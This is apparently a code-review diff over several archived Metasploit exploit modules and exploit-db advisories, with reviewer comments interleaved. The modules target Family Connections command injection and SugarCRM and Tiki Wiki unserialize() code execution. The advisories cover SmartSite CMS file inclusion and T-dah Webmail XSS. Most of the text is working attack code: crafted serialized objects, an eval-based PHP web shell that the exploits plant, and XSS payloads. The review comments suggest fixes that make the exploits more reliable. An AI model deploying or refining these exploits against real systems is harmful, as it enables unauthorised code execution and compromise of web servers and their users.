require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
@ -14,57 +14,57 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
\'Name\' => \'Family Connections less.php Remote Command Execution\',
|
||||
\'Description\' => %q{
|
||||
'Name' => 'Family Connections less.php Remote Command Execution',
|
||||
'Description' => %q{
|
||||
This module exploits an arbitrary command execution vulnerability in
|
||||
Family Connections 2.7.1. It\'s in the dev/less.php script and is due
|
||||
to an insecure use of system(). Authentication isn\'t required to exploit
|
||||
Family Connections 2.7.1. It's in the dev/less.php script and is due
|
||||
to an insecure use of system(). Authentication isn't required to exploit
|
||||
the vulnerability but register_globals must be set to On.
|
||||
},
|
||||
\'License\' => MSF_LICENSE,
|
||||
\'Author\' =>
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
\'mr_me <steventhomasseeley[at]gmail.com>\', # Vulnerability discovery and exploit
|
||||
\'juan vazquez\' # Metasploit module
|
||||
'mr_me <steventhomasseeley[at]gmail.com>', # Vulnerability discovery and exploit
|
||||
'juan vazquez' # Metasploit module
|
||||
],
|
||||
\'References\' =>
|
||||
'References' =>
|
||||
[
|
||||
[ \'URL\', \'https://www.familycms.com/blog/2011/11/security-vulnerability-fcms-2-5-2-7-1/\' ],
|
||||
[ \'URL\', \'http://sourceforge.net/apps/trac/fam-connections/ticket/407\' ],
|
||||
[ \'URL\', \'http://rwx.biz.nf/advisories/fc_cms_rce_adv.html\' ],
|
||||
[ \'URL\', \'http://www.exploit-db.com/exploits/18198/\' ]
|
||||
[ 'URL', 'https://www.familycms.com/blog/2011/11/security-vulnerability-fcms-2-5-2-7-1/' ],
|
||||
[ 'URL', 'http://sourceforge.net/apps/trac/fam-connections/ticket/407' ],
|
||||
[ 'URL', 'http://rwx.biz.nf/advisories/fc_cms_rce_adv.html' ],
|
||||
[ 'URL', 'http://www.exploit-db.com/exploits/18198/' ]
|
||||
],
|
||||
\'Privileged\' => false,
|
||||
\'Payload\' =>
|
||||
'Privileged' => false,
|
||||
'Payload' =>
|
||||
{
|
||||
\'Compat\' =>
|
||||
'Compat' =>
|
||||
{
|
||||
\'PayloadType\' => \'cmd\',
|
||||
\'RequiredCmd\' => \'generic telnet perl ruby\',
|
||||
'PayloadType' => 'cmd',
|
||||
'RequiredCmd' => 'generic telnet perl ruby',
|
||||
}
|
||||
},
|
||||
\'Platform\' => [\'unix\', \'linux\'],
|
||||
\'Arch\' => ARCH_CMD,
|
||||
\'Targets\' => [[\'Automatic\',{}]],
|
||||
\'DisclosureDate\' => \'Nov 29 2011\',
|
||||
\'DefaultTarget\' => 0
|
||||
'Platform' => ['unix', 'linux'],
|
||||
'Arch' => ARCH_CMD,
|
||||
'Targets' => [['Automatic',{}]],
|
||||
'DisclosureDate' => 'Nov 29 2011',
|
||||
'DefaultTarget' => 0
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new(\'URI\', [true, \"The path to the Family Connections main site\", \"/fcms/\"]),
|
||||
OptString.new('URI', [true, "The path to the Family Connections main site", "/fcms/"]),
|
||||
],self.class)
|
||||
end
|
||||
|
||||
def check
|
||||
uri = datastore[\'URI\']
|
||||
uri += (datastore[\'URI\'][-1, 1] == \"/\") ? \"dev/less.php\" : \"/dev/less.php\"
|
||||
uri = datastore['URI']
|
||||
uri += (datastore['URI'][-1, 1] == "/") ? "dev/less.php" : "/dev/less.php"
|
||||
|
||||
mark = Rex::Text.rand_text_alpha(rand(5) + 5)
|
||||
|
||||
res = send_request_cgi({
|
||||
\'uri\' => uri,
|
||||
\'vars_get\' => { \'argv[1]\' => \"|echo #{mark};#\" }
|
||||
'uri' => uri,
|
||||
'vars_get' => { 'argv[1]' => "|echo #{mark};#" }
|
||||
}, 25)
|
||||
|
||||
if res and res.code == 200 and res.body =~ /#{mark}/
|
||||
|
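Review bot: the two lines `uri = datastore['URI']` / `uri += (datastore['URI'][-1, 1] == "/") ? "dev/less.php" : "/dev/less.php"` are repeated verbatim in `exploit` below; factor them into a small helper (or use `normalize_uri`, if the targeted Metasploit version provides it) so a path fix lands in one place.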
@ -75,23 +75,23 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def exploit
|
||||
uri = datastore[\'URI\']
|
||||
uri += (datastore[\'URI\'][-1, 1] == \"/\") ? \"dev/less.php\" : \"/dev/less.php\"
|
||||
uri = datastore['URI']
|
||||
uri += (datastore['URI'][-1, 1] == "/") ? "dev/less.php" : "/dev/less.php"
|
||||
|
||||
start_mark = Rex::Text.rand_text_alpha(rand(5) + 5)
|
||||
end_mark = Rex::Text.rand_text_alpha(rand(5) + 5)
|
||||
custom_payload = \"|echo #{start_mark};#{payload.encoded};echo #{end_mark};#\"
|
||||
custom_payload = "|echo #{start_mark};#{payload.encoded};echo #{end_mark};#"
|
||||
|
||||
res = send_request_cgi({
|
||||
\'uri\' => uri,
|
||||
\'vars_get\' => { \'argv[1]\' => custom_payload }
|
||||
'uri' => uri,
|
||||
'vars_get' => { 'argv[1]' => custom_payload }
|
||||
}, 25)
|
||||
|
||||
if res and res.code == 200 and res.body =~ /#{start_mark}/
|
||||
# Prints output when using cmd/unix/generic
|
||||
result = res.body.split(/#{start_mark}/)[1].split(/#{end_mark}/)[0]
|
||||
if not result.strip.empty?
|
||||
print_status(\"Result of the command:\\n#{result}\")
|
||||
print_status("Result of the command:\n#{result}")
|
||||
end
|
||||
end
|
||||
end
|
||||
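Review bot: `result = res.body.split(/#{start_mark}/)[1].split(/#{end_mark}/)[0]` raises `NoMethodError` when `start_mark` is the last thing in the body (Ruby's `split` drops trailing empty strings, so `[1]` is `nil`), which is precisely the empty-output case the following `result.strip.empty?` test is meant to handle; a single capture such as `/#{start_mark}(.*?)#{end_mark}/m` with a `nil` guard is safer. The guard `res.body =~ /#{start_mark}/` is fine because `rand_text_alpha` yields no regex metacharacters.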
|
|
|
@ -21,29 +21,29 @@ Download link :http://sourceforge.net/projects/fam-connections/files/Family%20Co
|
|||
|
||||
page : messageboard.php?thread=1
|
||||
|
||||
decription: if you ADD javascript code in \" reply \" field , the code will execute in \" profile.php?member=1 \" page.
|
||||
decription: if you ADD javascript code in " reply " field , the code will execute in " profile.php?member=1 " page.
|
||||
|
||||
|
||||
page : familynews.php?addnews=yes
|
||||
|
||||
description : when you add news you can put js in \" text area \" field to execute
|
||||
description : when you add news you can put js in " text area " field to execute
|
||||
|
||||
|
||||
page : prayers.php
|
||||
|
||||
description : when you add prayer ,you can inject js in \"pray for\" field as \"<script>alert(/xss/)</script>\"
|
||||
description : when you add prayer ,you can inject js in "pray for" field as "<script>alert(/xss/)</script>"
|
||||
|
||||
|
||||
page : recipes.php?add=category
|
||||
|
||||
description : insert in \"name\" field \"><script>alert(/xss/)</script> , it will execute at \"recipes.php?addrecipe=yes\" page
|
||||
description : insert in "name" field "><script>alert(/xss/)</script> , it will execute at "recipes.php?addrecipe=yes" page
|
||||
|
||||
|
||||
page : calendar.php?add=2011-12-2
|
||||
|
||||
description : when add an event, insert in \"Event\" field (\"<script>alert(/xss/)</script>\")
|
||||
description : when add an event, insert in "Event" field ("<script>alert(/xss/)</script>")
|
||||
|
||||
it will execute at \"calendar.php\" page
|
||||
it will execute at "calendar.php" page
|
||||
|
||||
################################Reflected XSS#################################################################################
|
||||
|
||||
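Review bot: this hunk is mirrored advisory text, and the change correctly limits itself to removing the escaping from `\" reply \"` and `\"<script>alert(/xss/)</script>\"`; the original author's wording, including `decription:` in the first entry, is carried through unchanged, which is the right call for an archived third-party advisory.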
|
|
|
@ -5,7 +5,7 @@
|
|||
# http://metasploit.com/
|
||||
##
|
||||
|
||||
require \'msf/core\'
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
@ -14,141 +14,141 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
\'Name\' => \'SugarCRM <= 6.3.1 unserialize() PHP Code Execution\',
|
||||
\'Description\' => %q{
|
||||
'Name' => 'SugarCRM <= 6.3.1 unserialize() PHP Code Execution',
|
||||
'Description' => %q{
|
||||
This module exploits a php unserialize() vulnerability in SugarCRM <= 6.3.1
|
||||
which could be abused to allow authenticated SugarCRM users to execute arbitrary
|
||||
code with the permissions of the webserver.
|
||||
|
||||
The dangerous unserialize() exists in the \'include/MVC/View/views/view.list.php\'
|
||||
script, which is called with user controlled data from the \'current_query_by_page\'
|
||||
The dangerous unserialize() exists in the 'include/MVC/View/views/view.list.php'
|
||||
script, which is called with user controlled data from the 'current_query_by_page'
|
||||
parameter. The exploit abuses the __destruct() method from the SugarTheme class
|
||||
to write arbitrary PHP code to a \'pathCache.php\' on the web root.
|
||||
to write arbitrary PHP code to a 'pathCache.php' on the web root.
|
||||
},
|
||||
\'Author\' =>
|
||||
'Author' =>
|
||||
[
|
||||
\'EgiX\', # Vulnerability discovery and PoC
|
||||
\'juan vazquez\', # Metasploit module
|
||||
\'sinn3r\' # Metasploit module
|
||||
'EgiX', # Vulnerability discovery and PoC
|
||||
'juan vazquez', # Metasploit module
|
||||
'sinn3r' # Metasploit module
|
||||
],
|
||||
\'License\' => MSF_LICENSE,
|
||||
\'Version\' => \'$Revision$\',
|
||||
\'References\' =>
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
[ \'CVE\', \'2012-0694\' ],
|
||||
[ \'EDB\', \'19381\' ],
|
||||
[ \'URL\', \'http://www.sugarcrm.com/forums/f22/critical-security-vulnerability-76537/\' ]
|
||||
[ 'CVE', '2012-0694' ],
|
||||
[ 'EDB', '19381' ],
|
||||
[ 'URL', 'http://www.sugarcrm.com/forums/f22/critical-security-vulnerability-76537/' ]
|
||||
],
|
||||
\'Privileged\' => false,
|
||||
\'Platform\' => [\'php\'],
|
||||
\'Arch\' => ARCH_PHP,
|
||||
\'Payload\' =>
|
||||
'Privileged' => false,
|
||||
'Platform' => ['php'],
|
||||
'Arch' => ARCH_PHP,
|
||||
'Payload' =>
|
||||
{
|
||||
\'DisableNops\' => true,
|
||||
'DisableNops' => true,
|
||||
},
|
||||
\'Targets\' => [ [\'Automatic\', { }], ],
|
||||
\'DefaultTarget\' => 0,
|
||||
\'DisclosureDate\' => \'Jun 23 2012\'
|
||||
'Targets' => [ ['Automatic', { }], ],
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Jun 23 2012'
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new(\'TARGETURI\', [ true, \"The base path to the web application\", \"/sugarcrm/\"]),
|
||||
OptString.new(\'USERNAME\', [true, \"The username to authenticate with\" ]),
|
||||
OptString.new(\'PASSWORD\', [true, \"The password to authenticate with\" ])
|
||||
OptString.new('TARGETURI', [ true, "The base path to the web application", "/sugarcrm/"]),
|
||||
OptString.new('USERNAME', [true, "The username to authenticate with" ]),
|
||||
OptString.new('PASSWORD', [true, "The password to authenticate with" ])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
|
||||
def on_new_session(client)
|
||||
if client.type == \"meterpreter\"
|
||||
f = \"pathCache.php\"
|
||||
client.core.use(\"stdapi\") if not client.ext.aliases.include?(\"stdapi\")
|
||||
if client.type == "meterpreter"
|
||||
f = "pathCache.php"
|
||||
client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
|
||||
begin
|
||||
client.fs.file.rm(f)
|
||||
print_good(\"#{@peer} - #{f} removed to stay ninja\")
|
||||
print_good("#{@peer} - #{f} removed to stay ninja")
|
||||
rescue
|
||||
print_error(\"#{@peer} - Unable to remove #{f}\")
|
||||
print_error("#{@peer} - Unable to remove #{f}")
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
def exploit
|
||||
base = target_uri.path
|
||||
base << \'/\' if base[-1, 1] != \'/\'
|
||||
base << '/' if base[-1, 1] != '/'
|
||||
|
||||
@peer = \"#{rhost}:#{rport}\"
|
||||
username = datastore[\'USERNAME\']
|
||||
password = datastore[\'PASSWORD\']
|
||||
@peer = "#{rhost}:#{rport}"
|
||||
username = datastore['USERNAME']
|
||||
password = datastore['PASSWORD']
|
||||
|
||||
# Can\'t use vars_post because it\'ll escape \"_\"
|
||||
data = \"module=Users&\"
|
||||
data << \"action=Authenticate&\"
|
||||
data << \"user_name=#{username}&\"
|
||||
data << \"user_password=#{password}\"
|
||||
# Can't use vars_post because it'll escape "_"
|
||||
data = "module=Users&"
|
||||
data << "action=Authenticate&"
|
||||
data << "user_name=#{username}&"
|
||||
data << "user_password=#{password}"
|
||||
|
||||
res = send_request_cgi(
|
||||
{
|
||||
\'uri\' => \"#{base}index.php\" ,
|
||||
\'method\' => \"POST\",
|
||||
\'headers\' =>
|
||||
'uri' => "#{base}index.php" ,
|
||||
'method' => "POST",
|
||||
'headers' =>
|
||||
{
|
||||
\'Cookie\' => \"PHPSESSID=1\",
|
||||
'Cookie' => "PHPSESSID=1",
|
||||
},
|
||||
\'data\' => data
|
||||
'data' => data
|
||||
})
|
||||
|
||||
if not res or res.headers[\'Location\'] =~ /action=Login/ or not res.headers[\'Set-Cookie\']
|
||||
print_error(\"#{@peer} - Login failed with \\\"#{username}:#{password}\\\"\")
|
||||
if not res or res.headers['Location'] =~ /action=Login/ or not res.headers['Set-Cookie']
|
||||
print_error("#{@peer} - Login failed with \"#{username}:#{password}\"")
|
||||
return
|
||||
end
|
||||
|
||||
if res.headers[\'Set-Cookie\'] =~ /PHPSESSID=([A-Za-z0-9]*); path/
|
||||
if res.headers['Set-Cookie'] =~ /PHPSESSID=([A-Za-z0-9]*); path/
|
||||
session_id = $1
|
||||
else
|
||||
print_error(\"#{@peer} - Login failed with \\\"#{username}:#{password}\\\" (No session ID)\")
|
||||
print_error("#{@peer} - Login failed with \"#{username}:#{password}\" (No session ID)")
|
||||
return
|
||||
end
|
||||
|
||||
print_status(\"#{@peer} - Login successful with #{username}:#{password}\")
|
||||
print_status("#{@peer} - Login successful with #{username}:#{password}")
|
||||
|
||||
data = \"module=Contacts&\"
|
||||
data << \"Contacts2_CONTACT_offset=1&\"
|
||||
data << \"current_query_by_page=\"
|
||||
#O:10:\"SugarTheme\":2:{s:10:\"*dirName\";s:5:\"../..\";s:20:\"SugarTheme_jsCache\";s:49:\"<?php eval(base64_decode($_SERVER[HTTP_CMD])); ?>\";}
|
||||
data << \"TzoxMDoiU3VnYXJUaGVtZSI6Mjp7czoxMDoiACoAZGlyTmFtZSI7czo1OiIuLi8uLiI7czoyMDoiAFN1Z2FyVGhlbWUAX2pzQ2FjaGUiO3M6NDk6Ijw/cGhwIGV2YWwoYmFzZTY0X2RlY29kZSgkX1NFUlZFUltIVFRQX0NNRF0pKTsgPz4iO30=\"
|
||||
data = "module=Contacts&"
|
||||
data << "Contacts2_CONTACT_offset=1&"
|
||||
data << "current_query_by_page="
|
||||
#O:10:"SugarTheme":2:{s:10:"*dirName";s:5:"../..";s:20:"SugarTheme_jsCache";s:49:"<?php eval(base64_decode($_SERVER[HTTP_CMD])); ?>";}
|
||||
data << "TzoxMDoiU3VnYXJUaGVtZSI6Mjp7czoxMDoiACoAZGlyTmFtZSI7czo1OiIuLi8uLiI7czoyMDoiAFN1Z2FyVGhlbWUAX2pzQ2FjaGUiO3M6NDk6Ijw/cGhwIGV2YWwoYmFzZTY0X2RlY29kZSgkX1NFUlZFUltIVFRQX0NNRF0pKTsgPz4iO30="
|
||||
|
||||
print_status(\"#{@peer} - Exploiting the unserialize()\")
|
||||
print_status("#{@peer} - Exploiting the unserialize()")
|
||||
|
||||
res = send_request_cgi(
|
||||
{
|
||||
\'uri\' => \"#{base}index.php\",
|
||||
\'method\' => \'POST\',
|
||||
\'headers\' =>
|
||||
'uri' => "#{base}index.php",
|
||||
'method' => 'POST',
|
||||
'headers' =>
|
||||
{
|
||||
\'Cookie\' => \"PHPSESSID=#{session_id};\",
|
||||
'Cookie' => "PHPSESSID=#{session_id};",
|
||||
},
|
||||
\'data\' => data
|
||||
'data' => data
|
||||
})
|
||||
|
||||
if not res or res.code != 200
|
||||
print_error(\"#{@peer} - Exploit failed: #{res.code}\")
|
||||
print_error("#{@peer} - Exploit failed: #{res.code}")
|
||||
return
|
||||
end
|
||||
|
||||
print_status(\"#{@peer} - Executing the payload\")
|
||||
print_status("#{@peer} - Executing the payload")
|
||||
|
||||
res = send_request_cgi(
|
||||
{
|
||||
\'method\' => \'GET\',
|
||||
\'uri\' => \"#{base}pathCache.php\",
|
||||
\'headers\' => {
|
||||
\'Cmd\' => Rex::Text.encode_base64(payload.encoded)
|
||||
'method' => 'GET',
|
||||
'uri' => "#{base}pathCache.php",
|
||||
'headers' => {
|
||||
'Cmd' => Rex::Text.encode_base64(payload.encoded)
|
||||
}
|
||||
})
|
||||
|
||||
if res
|
||||
print_error(\"#{@peer} - Payload execution failed: #{res.code}\")
|
||||
print_error("#{@peer} - Payload execution failed: #{res.code}")
|
||||
return
|
||||
end
|
||||
|
||||
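Review bot: `if not res or res.code != 200` followed by `print_error("#{@peer} - Exploit failed: #{res.code}")` dereferences `res` in the branch that exists for `res` being `nil`, so a timed-out request ends in `NoMethodError` instead of the intended error message; print `res ? res.code : 'no response'` or split the two conditions. The same pattern recurs in the Tiki Wiki module below. Separately, `if res` / `print_error("#{@peer} - Payload execution failed: #{res.code}")` treats any HTTP answer from `pathCache.php` as failure, which is only true for payloads that never return; a PHP payload that completes and lets the script return 200 would be misreported.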
|
|
|
@ -5,7 +5,7 @@
|
|||
# http://metasploit.com/
|
||||
##
|
||||
|
||||
require \'msf/core\'
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
@ -14,14 +14,14 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
\'Name\' => \'Tiki Wiki <= 8.3 unserialize() PHP Code Execution\',
|
||||
\'Description\' => %q{
|
||||
'Name' => 'Tiki Wiki <= 8.3 unserialize() PHP Code Execution',
|
||||
'Description' => %q{
|
||||
This module exploits a php unserialize() vulnerability in Tiki Wiki <= 8.3
|
||||
which could be abused to allow unauthenticated users to execute arbitrary code
|
||||
under the context of the webserver user.
|
||||
|
||||
The dangerous unserialize() exists in the \'tiki-print_multi_pages.php\' script,
|
||||
which is called with user controlled data from the \'printpages\' parameter.
|
||||
The dangerous unserialize() exists in the 'tiki-print_multi_pages.php' script,
|
||||
which is called with user controlled data from the 'printpages' parameter.
|
||||
The exploit abuses the __destruct() method from the Zend_Pdf_ElementFactory_Proxy
|
||||
class to write arbitrary PHP code to a file on the Tiki Wiki web directory.
|
||||
|
||||
|
@ -31,111 +31,111 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
version older than 5.3.4 must be used to allow poison null bytes in filesystem related
|
||||
functions. The exploit has been tested successfully on Ubuntu 9.10 and Tiki Wiki 8.3.
|
||||
},
|
||||
\'Author\' =>
|
||||
'Author' =>
|
||||
[
|
||||
\'EgiX\', # Vulnerability discovery and PoC
|
||||
\'juan vazquez\' # Metasploit module
|
||||
'EgiX', # Vulnerability discovery and PoC
|
||||
'juan vazquez' # Metasploit module
|
||||
],
|
||||
\'License\' => MSF_LICENSE,
|
||||
\'Version\' => \'$Revision$\',
|
||||
\'References\' =>
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
[ \'CVE\', \'2012-0911\' ],
|
||||
[ \'BID\', \'54298\' ],
|
||||
[ \'EDB\', \'19573\' ],
|
||||
[ \'URL\', \'http://dev.tiki.org/item4109\' ]
|
||||
[ 'CVE', '2012-0911' ],
|
||||
[ 'BID', '54298' ],
|
||||
[ 'EDB', '19573' ],
|
||||
[ 'URL', 'http://dev.tiki.org/item4109' ]
|
||||
],
|
||||
\'Privileged\' => false,
|
||||
\'Platform\' => [\'php\'],
|
||||
\'Arch\' => ARCH_PHP,
|
||||
\'Payload\' =>
|
||||
'Privileged' => false,
|
||||
'Platform' => ['php'],
|
||||
'Arch' => ARCH_PHP,
|
||||
'Payload' =>
|
||||
{
|
||||
\'DisableNops\' => true,
|
||||
'DisableNops' => true,
|
||||
},
|
||||
\'Targets\' => [ [\'Automatic\', {}] ],
|
||||
\'DefaultTarget\' => 0,
|
||||
\'DisclosureDate\' => \'Jul 04 2012\'
|
||||
'Targets' => [ ['Automatic', {}] ],
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Jul 04 2012'
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new(\'TARGETURI\', [ true, \"The base path to the web application\", \"/tiki/\"])
|
||||
OptString.new('TARGETURI', [ true, "The base path to the web application", "/tiki/"])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
|
||||
def on_new_session(client)
|
||||
if client.type == \"meterpreter\"
|
||||
client.core.use(\"stdapi\") if not client.ext.aliases.include?(\"stdapi\")
|
||||
if client.type == "meterpreter"
|
||||
client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
|
||||
begin
|
||||
client.fs.file.rm(@upload_php)
|
||||
print_good(\"#{@peer} - #{@upload_php} removed to stay ninja\")
|
||||
print_good("#{@peer} - #{@upload_php} removed to stay ninja")
|
||||
rescue
|
||||
print_error(\"#{@peer} - Unable to remove #{f}\")
|
||||
print_error("#{@peer} - Unable to remove #{f}")
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
def exploit
|
||||
base = target_uri.path
|
||||
base << \'/\' if base[-1, 1] != \'/\'
|
||||
@upload_php = rand_text_alpha(rand(4) + 4) + \".php\"
|
||||
@peer = \"#{rhost}:#{rport}\"
|
||||
base << '/' if base[-1, 1] != '/'
|
||||
@upload_php = rand_text_alpha(rand(4) + 4) + ".php"
|
||||
@peer = "#{rhost}:#{rport}"
|
||||
|
||||
print_status(\"#{@peer} - Disclosing the path of the Tiki Wiki on the filesystem\")
|
||||
print_status("#{@peer} - Disclosing the path of the Tiki Wiki on the filesystem")
|
||||
|
||||
res = send_request_cgi(
|
||||
\'uri\' => \"#{base}tiki-rss_error.php\"
|
||||
'uri' => "#{base}tiki-rss_error.php"
|
||||
)
|
||||
|
||||
if not res or res.code != 200 or not res.body =~ /[> ](\\/.*)tiki-rss_error\\.php/
|
||||
print_error \"Tiki Wiki path couldn\'t be disclosed. The php setting \'display_errors\' must be On.\"
|
||||
if not res or res.code != 200 or not res.body =~ /[> ](\/.*)tiki-rss_error\.php/
|
||||
print_error "Tiki Wiki path couldn't be disclosed. The php setting 'display_errors' must be On."
|
||||
return
|
||||
else
|
||||
tiki_path = $1
|
||||
print_good \"#{@peer} - Tiki Wiki path disclosure: #{tiki_path}\"
|
||||
print_good "#{@peer} - Tiki Wiki path disclosure: #{tiki_path}"
|
||||
end
|
||||
|
||||
php_payload = \"<?php eval(base64_decode($_SERVER[HTTP_CMD])); ?>\"
|
||||
php_payload = "<?php eval(base64_decode($_SERVER[HTTP_CMD])); ?>"
|
||||
|
||||
printpages = \"O:29:\\\"Zend_Pdf_ElementFactory_Proxy\\\":1:\"
|
||||
printpages << \"{s:39:\\\"%00Zend_Pdf_ElementFactory_Proxy%00_factory\\\";O:51:\\\"Zend_Search_Lucene_Index_SegmentWriter_StreamWriter\\\":5:\"
|
||||
printpages << \"{s:12:\\\"%00*%00_docCount\\\";i:1;s:8:\\\"%00*%00_name\\\";s:3:\\\"foo\\\";s:13:\\\"%00*%00_directory\\\";O:47:\\\"Zend_Search_Lucene_Storage_Directory_Filesystem\\\":1:\"
|
||||
printpages << \"{s:11:\\\"%00*%00_dirPath\\\";s:#{tiki_path.length + @upload_php.length + 1}:\\\"#{tiki_path + @upload_php}%00\\\";}\"
|
||||
printpages << \"s:10:\\\"%00*%00_fields\\\";a:1:\"
|
||||
printpages << \"{i:0;O:34:\\\"Zend_Search_Lucene_Index_FieldInfo\\\":1:\"
|
||||
printpages << \"{s:4:\\\"name\\\";s:#{php_payload.length}:\\\"#{php_payload}\\\";}}\"
|
||||
printpages << \"s:9:\\\"%00*%00_files\\\";O:8:\\\"stdClass\\\":0:{}}}\"
|
||||
printpages = "O:29:\"Zend_Pdf_ElementFactory_Proxy\":1:"
|
||||
printpages << "{s:39:\"%00Zend_Pdf_ElementFactory_Proxy%00_factory\";O:51:\"Zend_Search_Lucene_Index_SegmentWriter_StreamWriter\":5:"
|
||||
printpages << "{s:12:\"%00*%00_docCount\";i:1;s:8:\"%00*%00_name\";s:3:\"foo\";s:13:\"%00*%00_directory\";O:47:\"Zend_Search_Lucene_Storage_Directory_Filesystem\":1:"
|
||||
printpages << "{s:11:\"%00*%00_dirPath\";s:#{tiki_path.length + @upload_php.length + 1}:\"#{tiki_path + @upload_php}%00\";}"
|
||||
printpages << "s:10:\"%00*%00_fields\";a:1:"
|
||||
printpages << "{i:0;O:34:\"Zend_Search_Lucene_Index_FieldInfo\":1:"
|
||||
printpages << "{s:4:\"name\";s:#{php_payload.length}:\"#{php_payload}\";}}"
|
||||
printpages << "s:9:\"%00*%00_files\";O:8:\"stdClass\":0:{}}}"
|
||||
|
||||
print_status(\"#{@peer} - Exploiting the unserialize() to upload PHP code\")
|
||||
print_status("#{@peer} - Exploiting the unserialize() to upload PHP code")
|
||||
|
||||
res = send_request_cgi(
|
||||
{
|
||||
\'uri\' => \"#{base}tiki-print_multi_pages.php\",
|
||||
\'method\' => \'POST\',
|
||||
\'vars_post\' => {
|
||||
\'printpages\' => printpages
|
||||
'uri' => "#{base}tiki-print_multi_pages.php",
|
||||
'method' => 'POST',
|
||||
'vars_post' => {
|
||||
'printpages' => printpages
|
||||
}
|
||||
})
|
||||
|
||||
if not res or res.code != 200
|
||||
print_error(\"#{@peer} - Exploit failed: #{res.code}. The Tiki Wiki Multiprint feature must be enabled.\")
|
||||
print_error("#{@peer} - Exploit failed: #{res.code}. The Tiki Wiki Multiprint feature must be enabled.")
|
||||
return
|
||||
end
|
||||
|
||||
print_status(\"#{@peer} - Executing the payload #{@upload_php}\")
|
||||
print_status("#{@peer} - Executing the payload #{@upload_php}")
|
||||
|
||||
res = send_request_cgi(
|
||||
{
|
||||
\'method\' => \'GET\',
|
||||
\'uri\' => \"#{base + @upload_php}\",
|
||||
\'headers\' => {
|
||||
\'Cmd\' => Rex::Text.encode_base64(payload.encoded)
|
||||
'method' => 'GET',
|
||||
'uri' => "#{base + @upload_php}",
|
||||
'headers' => {
|
||||
'Cmd' => Rex::Text.encode_base64(payload.encoded)
|
||||
}
|
||||
})
|
||||
|
||||
if res
|
||||
print_error(\"#{@peer} - Payload execution failed: #{res.code}\")
|
||||
print_error("#{@peer} - Payload execution failed: #{res.code}")
|
||||
return
|
||||
end
|
||||
|
||||
|
|
|
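Review bot: the failure branch `if not res or res.code != 200` dereferences `res` inside its own error message (`Exploit failed: #{res.code}`), so a nil response (timeout, refused connection) raises NoMethodError instead of printing the intended "Multiprint feature must be enabled" hint; use something like `#{res ? res.code : 'no response'}`. The later check `if res` followed by `print_error("Payload execution failed")` treats any HTTP reply as failure, which is right for a reverse payload that never returns but gives a false negative for payloads that do answer, so that assumption deserves a comment. Dropping the `\"` escapes so the serialized Zend object is valid Ruby is correct; note though that the declared lengths (`s:#{tiki_path.length + @upload_php.length + 1}` for the trailing `%00`) are only right if `printpages` is not percent-encoded a second time when sent through `vars_post`, since `%00` arriving as `%2500` would break every `s:N:` length in the payload.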
@ -10,16 +10,16 @@ Vulnerable: smartsite cms v1.0
|
|||
vulnerable code:
|
||||
----------------------
|
||||
1-in comment.php :
|
||||
require($root . \"include/inc_foot.php\");
|
||||
require($root . "include/inc_foot.php");
|
||||
---------------------------------------
|
||||
2-in /admin/test.php :
|
||||
require($root . \"include/inc_adminfooter.php\");
|
||||
require($root . "include/inc_adminfooter.php");
|
||||
---------------------------------------
|
||||
3-in /admin/index.php :
|
||||
require($root . \"admin/include/inc_adminfooter.php\");
|
||||
require($root . "admin/include/inc_adminfooter.php");
|
||||
---------------------------------------
|
||||
4-in /admin/include/inc_adminfoot.php:
|
||||
require($root . \"include/inc_footer.php\");
|
||||
require($root . "include/inc_footer.php");
|
||||
---------------------------------------
|
||||
$root parameter File include
|
||||
-----------------------------------------------------------------------------------------------------------------------------------------
|
||||
|
|
|
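Review bot: the closing line `$root parameter File include` states the finding without its precondition. The four listed `require($root . "include/...")` lines show only the sink; for them to be exploitable `$root` has to be attacker-controllable (typically `register_globals=On` with `$root` never initialised before the `require`), and a remote include additionally needs `allow_url_include`. Spelling out how `$root` is supplied and whether the include is local-only or remote would make the advisory reproducible.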
@ -1,6 +1,6 @@
|
|||
#!/usr/bin/python
|
||||
|
||||
\'\'\'
|
||||
'''
|
||||
|
||||
# Exploit Title: T-dah Webmail Multiple Stored XSS issues.
|
||||
# Date: 17/08/2012
|
||||
|
@ -26,11 +26,11 @@ Vulnerability Description
|
|||
Send an email to the victim with the payload in the e-mail body.
|
||||
XSS Will be triggered when the user clicks the link.
|
||||
|
||||
XSS Payload: <a href=javascript:alert(\"XSS\")>Click Me</a>
|
||||
XSS Payload: <a href=javascript:alert("XSS")>Click Me</a>
|
||||
|
||||
2. Stored XSS in email body (Previously Discovered by loneferret - http://www.exploit-db.com/exploits/20364/).
|
||||
|
||||
XSS Payload: <img src=\'1.jpg\'onerror=javascript:alert(\"XSS\")>
|
||||
XSS Payload: <img src='1.jpg'onerror=javascript:alert("XSS")>
|
||||
|
||||
Send an email to the victim with the payload in the email body, once the user opens the message XSS should be triggered.
|
||||
|
||||
|
